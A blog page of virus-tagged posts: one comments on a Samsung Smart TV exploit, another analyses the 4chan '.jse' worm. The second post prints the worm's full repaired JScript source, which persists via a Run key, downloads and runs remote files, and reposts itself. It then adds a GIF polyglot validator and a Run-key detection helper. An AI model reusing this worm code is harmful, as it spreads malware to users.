Posts Tagged ‘virus’

Chinese lottery in da house!
A few days ago ReVuln, a Maltese security company, published a 0-day exploit for Samsung Smart TV firmware. The remote root exploit gives complete control of the TV: downloading the USB media history, installing any app, sharing drives, etc. Some thoughts come to mind:
- It's not surprising! This is just a PC, so why shouldn't there be bugs? These companies optimize costs (as everyone does), so they use Linux or BSD as a base. That is why alternative firmwares exist (SamyGO, OpenLGTV), and I think they will become as widespread as alternative router firmwares (OpenWrt, DD-WRT, etc.) or aftermarket firmwares for smartphones (e.g. CyanogenMod). I just want to point out that it is not rocket science to hack an alternative OS or to find bugs in the factory default: known hardware, known OS, no difference.
- Don't panic! There is little chance of a real attack. These TVs sit behind a router/NAT. True, these routers are not exactly fortresses (lots of default passwords, etc.), but that limits where an exploit can run: you need internal access, a foothold inside the LAN from which the exploit can run. Probably you hack the neighbour's wifi if he is playing Gangnam Style too loud.

- Turn off your TV. If it is off, there is no network connection. I just tried to nmap my smart TV, but no one is home who could turn it on. It's high time to add a wake-on-LAN feature!

- Surprise! I can imagine a virus that scans the victim's LAN and, if it finds a smart TV, installs a surprise app.
- Any code can run on it! As it is a PC, anything that runs on your desktop PC can run on it.
Years ago there was a theory that assumed every Chinese home could run code that breaks RSA keys; from that assumption one can calculate the time needed for RSA key recovery. There is even an RFC on it: RFC 3607. I feel like the time of the Chinese lottery has literally arrived (in the technical sense it has been here for a long time).
Reference: ReVuln – The TV is watching you

Anon, you’ve been infct’d
For those who do not know: 4chan is one of the biggest and, especially its sub-site called "/b/", the most trafficked message boards on the net. But all these tons of people do not create value and do not discuss important (or even unimportant) matters: it's complete and utter nonsense in a totally un-PC and NSFW way. To quote Wikipedia:
Douglas said of the board, "reading /b/ will melt your brain", and cited Encyclopedia Dramatica's definition of /b/ as "the asshole of the Internet". Mattathias Schwartz of The New York Times likened /b/ to "a high-school bathroom stall, or an obscene telephone party line", while Baltimore City Paper wrote that "/b/ is the kid with a collection of butterfly knives and a locker full of porn … in the high school of the Internet". Wired describes /b/ as notorious.
Sitting down to read /b/ is similar to watching Jerry Springer: you know it will suck away your IQ and that any respectable person will despise you for it, but for the times when you can't do anything meaningful, it can be pretty good fun.
That fun was ruined a couple of days ago for all those /b/tards (that's what the frequent posters call themselves) for a day, when a virus based partly on some simple Windows scripting and partly on social engineering took over the site; and that's where it gets interesting from the security point of view.
The basic concept of the virus was to get the user to download an image, rename it to 4chan.jse and run it as an executable. The "image" is a script written for Windows Script Host, encoded with Microsoft's Script Encoder so that the site's upload form accepts it as an image. The script then fetches a random image from the message board and tries to run it as a script; if that succeeds, it concludes that the image is a previously posted copy of itself and reposts it, spreading the virus further. If the fetched image is not a runnable script, it just tries another one, in an infinite loop.
As Microsoft's Script Encoder is just a simple tool to stop script kiddies from ripping off code used on websites (more an obfuscator than real encryption), the script could be decoded, and the revealed WScript code is quite interesting. Not because it contains clever tricks or elegant solutions, only because it's quite rare to see such a simple yet so successful virus, one that can be understood without any knowledge of the affected system or, hell, even of the programming language it was written in. So here it is in all its glory, the <100 lines of code that stopped Rickrolling for one day:
```javascript
// Decoded 4chan.jse worm as dumped by the blog author, with the extraction damage
// repaired: straight quotes, and the backslashes of the regexes, the registry path
// and the CRLF sequences restored. The file starts with a GIF header so the image
// upload form accepts it; as JScript this first line is merely an assignment to a
// global named GIF89aI.
GIF89aI = "x1!þ÷";
var xhr = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var ie = new ActiveXObject("InternetExplorer.Application");
"‰"; // stray string-literal statements like this one are no-ops left in the dump
// Stage 1: copy itself into the temp folder (special folder 2) and persist through
// the HKCU Run key, running silently (wscript /b). This registry value is the
// artifact to look for on an infected machine.
shell.currentDirectory = fso.getSpecialFolder(2);
shell.run("cmd /c copy \"" + WSH.scriptFullName + "\" sys.jse");
try {
  "û";
  shell.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sysjse",
                 "wscript /b " + fso.getSpecialFolder(2) + "\\sys.jse");
} catch (e) {}
// Stage 2, forever: fetch the board index, download the first image it links to and
// try to execute it as a script, then repost the worm body into the newest thread.
while (1) {
  try {
    xhr.open("get", "http://img.4chan.org/b/", 0);
    "ö";
    xhr.setRequestHeader("If-Modified-Since", new Date(0));
    xhr.send();
    var page = xhr.responseText;
    try {
      // the first image link on the index is saved as j.jse and run as a script
      xhr.open("get", page.match(/<a href="(http:\/\/img.4chan.org\/b\/src\/\d+....)/)[1], 0);
      "è";
      xhr.send();
      var im = new ActiveXObject("Adodb.Stream");
      im.mode = 3;
      im.type = 1;
      im.open();
      im.write(xhr.responseBody);
      im.saveToFile("j.jse", 2);
      "ÿ";
      shell.run("wscript /b j.jse");
    } catch (e) {}
    // build a multipart/form-data reply body: prefix (y) + worm file (sys.jse) + suffix (z) -> p
    var bdry = ("" + Math.random()).substr(2);
    var head = "\r\n--" + bdry + "\r\nContent-Disposition: form-data; name=";
    var part1 = fso.openTextFile("y", 2, 1);
    "Ó";
    part1.write(head + "resto\r\n\r\n" + page.match(/<span id="nothread(\d+)/)[1] +
                head + "upfile; filename=a.gif\r\n\r\n");
    part1.close();
    var part2 = fso.openTextFile("z", 2, 1);
    "ú";
    // random digits are appended to the end of the "image", presumably so that
    // every upload has a different hash
    part2.write(("" + Math.random()).substr(2) + head + "mode\r\n\r\nregist\r\n--" + bdry + "--\r\n");
    part2.close();
    shell.run("cmd /c copy /b y+sys.jse+z p", 0, 1);
    var post = new ActiveXObject("Adodb.Stream");
    "Ù";
    post.mode = 3;
    post.type = 1;
    post.open();
    post.loadFromFile("p");
    try {
      // load the board in an IE instance and expire the nws_style cookie before posting
      ie.navigate("http://img.4chan.org/b/");
      do {
        WSH.sleep(100);
        "Å";
      } while (ie.readyState != 4);
      ie.stop();
      ie.document.cookie = "nws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org";
    } catch (e) {}
    "ö";
    xhr.open("post", "http://dat.4chan.org/b/imgboard.php", 0);
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + bdry);
    xhr.send(post);
    WSH.sleep(50000);
  } catch (e) {}
}
```
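The upload form let the script through because it only looked at the leading "GIF89a" bytes. The following structural GIF validator is an added example (written for this page, not the blog's code and not anything 4chan ran) of the server-side check that would have rejected the polyglot: it walks every block of the file from the logical screen descriptor to the 0x3B trailer and refuses anything that is not a GIF block or that carries bytes after the trailer. The minimal GIF and the worm-style polyglot prefix used at the end are constructed test inputs.

```javascript
// Structural GIF validator (Node.js, no dependencies). Added example, not the blog's code.
// Returns true only if the buffer is a sequence of well-formed GIF blocks ending in the
// trailer byte 0x3B with nothing after it; a script hiding behind a "GIF89a" header fails.
function isWellFormedGif(buf) {
  const magic = buf.toString('latin1', 0, 6);
  if (magic !== 'GIF87a' && magic !== 'GIF89a') return false;
  let pos = 6;
  // logical screen descriptor: width(2) height(2) packed(1) bg index(1) aspect(1)
  if (buf.length < pos + 7) return false;
  const packed = buf[pos + 4];
  pos += 7;
  if (packed & 0x80) pos += 3 * (1 << ((packed & 0x07) + 1)); // global color table
  // data sub-blocks: length-prefixed chunks terminated by a zero-length block
  const skipSubBlocks = () => {
    for (;;) {
      if (pos >= buf.length) return false;
      const len = buf[pos++];
      if (len === 0) return true;
      pos += len;
    }
  };
  for (;;) {
    if (pos >= buf.length) return false;          // ran out of data before the trailer
    const introducer = buf[pos++];
    if (introducer === 0x3b) return pos === buf.length; // trailer must be the last byte
    if (introducer === 0x21) {                    // extension: label byte + sub-blocks
      pos += 1;
      if (!skipSubBlocks()) return false;
    } else if (introducer === 0x2c) {             // image descriptor: 9 bytes
      if (pos + 9 > buf.length) return false;
      const localPacked = buf[pos + 8];
      pos += 9;
      if (localPacked & 0x80) pos += 3 * (1 << ((localPacked & 0x07) + 1)); // local color table
      pos += 1;                                   // LZW minimum code size
      if (!skipSubBlocks()) return false;
    } else {
      return false;                               // not a GIF block: e.g. script text
    }
  }
}

// Constructed 1x1 GIF: header, screen descriptor, 2-entry color table, image, trailer.
const MINIMAL_GIF = Buffer.from([
  0x47, 0x49, 0x46, 0x38, 0x39, 0x61,             // "GIF89a"
  0x01, 0x00, 0x01, 0x00, 0x80, 0x00, 0x00,       // 1x1, global color table present
  0x00, 0x00, 0x00, 0xff, 0xff, 0xff,             // black, white
  0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, // image descriptor
  0x02, 0x02, 0x44, 0x01, 0x00,                   // LZW min code size + one data sub-block
  0x3b,                                           // trailer
]);

// Constructed polyglot in the worm's style: GIF magic followed by JScript source.
const WORM_STYLE_POLYGLOT = Buffer.from(
  'GIF89aI = "x1!";\r\nvar xhr = new ActiveXObject("Msxml2.XMLHTTP");', 'latin1');

console.log('minimal GIF accepted:', isWellFormedGif(MINIMAL_GIF));          // true
console.log('polyglot accepted:', isWellFormedGif(WORM_STYLE_POLYGLOT));     // false
```

The trailer rule is the part that matters most for this kind of attack: a real image with script appended after 0x3B is rejected just like the header-only forgery, so neither "GIF first, script after" nor "script first" gets through.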
It turns out that this was actually the sixth time a similar virus took down the site. There have been trickier variations that took pictures from the user's My Documents folder to use as new containers for the program, and simpler ones that simply posted the script itself along with instructions to copy-paste and save it with Notepad.
Don't even get me started on how many levels this virus's spread could have been prevented at (users not downloading and running unknown things from a site they know gathers the worst kind of crowd, captchas preventing automated posting, etc.). One thing is sure: the site's administrators managed to stop the repostings and, a day later, business was back to usual. And we got to see yet again how an extremely simple piece of code can bring an entire site down in a matter of hours.
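On the client side, the one durable trace the worm leaves is the Run-key value that starts wscript silently on a .jse in the temp folder. The triage helper below is an added example (not the blog's code) of turning that into a check: it parses reg query-style output for the HKCU Run key and flags autostart entries that launch the Windows Script Host or point at a WSH script file. The sample output is constructed, and value names are assumed to contain no spaces.

```javascript
// Run-key triage helper. Added example, not the blog's code. Parses `reg query`-style
// output and flags autostart entries that launch wscript/cscript or reference a WSH
// script file (.jse/.vbe/.js/.vbs/.wsf), the persistence shape the worm installs.
// SAMPLE_REG_OUTPUT is constructed, not taken from a real machine.
const SAMPLE_REG_OUTPUT = `
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    OneDrive    REG_SZ    "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background
    sysjse      REG_SZ    wscript /b C:\\Users\\alice\\AppData\\Local\\Temp\\sys.jse
    Updater     REG_SZ    cscript //nologo "C:\\ProgramData\\vendor\\update.vbs"
`;

// One value line: "    <name>    REG_<type>    <data>" (assumes names without spaces)
const ENTRY_RE = /^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*)$/;
// wscript/cscript as the launched program, quoted or not, with or without a path
const SCRIPT_HOST_RE = /^"?(?:[^"\s]*\\)?[wc]script(?:\.exe)?"?(?:\s|$)/i;
// a WSH script file anywhere on the command line
const SCRIPT_FILE_RE = /[^"\s]+\.(?:jse|vbe|js|vbs|wsf)(?="|\s|$)/i;

function parseRunEntries(text) {
  const entries = [];
  for (const line of text.split(/\r?\n/)) {
    const m = ENTRY_RE.exec(line);
    if (m) entries.push({ name: m[1], type: m[2], command: m[3].trim() });
  }
  return entries;
}

// Returns a finding for a suspicious entry, or null for an entry that does not
// involve the script host at all.
function classifyAutostart(entry) {
  const viaScriptHost = SCRIPT_HOST_RE.test(entry.command);
  const fileMatch = SCRIPT_FILE_RE.exec(entry.command);
  if (!viaScriptHost && !fileMatch) return null;
  return {
    name: entry.name,
    command: entry.command,
    scriptFile: fileMatch ? fileMatch[0] : null,
    // wscript /b is batch mode: every dialog and error is suppressed, which is
    // why the worm used it
    silent: /(?:^|\s)\/b(?:\s|$)/i.test(entry.command),
  };
}

function findSuspiciousAutostarts(text) {
  return parseRunEntries(text).map(classifyAutostart).filter(Boolean);
}

for (const hit of findSuspiciousAutostarts(SAMPLE_REG_OUTPUT)) {
  console.log(`${hit.name}: ${hit.command}  [script=${hit.scriptFile}, silent=${hit.silent}]`);
}
```

Both WSH entries are reported, including the legitimate-looking vendor updater: the point of the check is to surface every autostart that hands control to the script host so a human can decide, with the silent flag and the script path as the two details worth looking at first.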


